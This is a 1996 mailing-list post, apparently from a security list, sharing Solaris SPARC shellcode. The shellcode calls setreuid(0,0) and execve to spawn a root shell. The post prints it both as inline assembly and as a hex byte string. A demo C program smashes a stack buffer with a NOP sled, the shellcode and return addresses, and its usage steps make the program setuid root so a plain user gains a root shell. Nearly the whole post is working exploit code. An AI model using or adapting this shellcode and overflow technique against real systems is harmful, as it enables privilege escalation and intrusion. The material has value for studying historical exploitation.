Re: /bin/ksh sparc code
From: aaronb () j51 com (Aaron Bornstein)
Date: Tue, 3 Dec 1996 15:18:19 -0500
Our good buddy Kichang wrote the following:
So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0). I know it's no big deal, almost close to lame, but I think it's kinda
That's one way to do it, but I don't like ksh. So, I decided to modify it to do a setreuid() call before anything else. Here's the code: --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE-- /* Solaris */ main() { __asm__ ( "mov 0xca, %g1 \n" /* 202 - setreuid() */ "xor %o1,%o1,%o1 \n" "and %o1,%o1,%o0 \n" "ta 8 \n" "sethi 0xbd89a, %l6 \n" "or %l6, 0x16e, %l6 \n" "sethi 0xbdcda, %l7 \n" "and %sp, %sp, %o0 \n" "add %sp, 8, %o1 \n" "xor %o2, %o2, %o2 \n" "add %sp, 16, %sp \n" "std %l6, [%sp - 16] \n" "st %sp, [%sp - 8] \n" "st %g0, [%sp - 4] \n" "mov 0x3b, %g1 \n" /* 59 - execve() */ "ta 8 \n" ); } --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE-- And a demonstration program. Usage: # cc -o demo demo.c # chmod 4755 demo # su plainuser % ./demo # --CUT HERE--solaris-shellcode-example1.c--CUT HERE-- #include <sys/types.h> #define NOP 0xa61cc013 #define BUFSIZE 256 #define CODESIZE 64 char shellcode[] = "\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"; char bigbuf[BUFSIZE * 2]; u_long get_sp() { __asm__("mov %sp, %i0 \n"); } void overflow_me() { char lilbuf[BUFSIZE]; u_long *lp; char *cp; int i; lp = (u_long *)bigbuf; for (i = 0 ; i < BUFSIZE - CODESIZE ; i += 4) *lp++ = NOP; cp = (char *)lp; for (i = 0 ; i < CODESIZE ; i++) *cp++ = shellcode[i]; lp = (u_long *)cp; for (i = BUFSIZE ; i < BUFSIZE * 2 ; i += 4) /* *lp++ = (u_long)lilbuf; */ *lp++ = get_sp() + 224; strcpy(lilbuf, bigbuf); } void main(int argc, char **argv) { overflow_me(); } --CUT HERE--solaris-shellcode-example1.c--CUT HERE--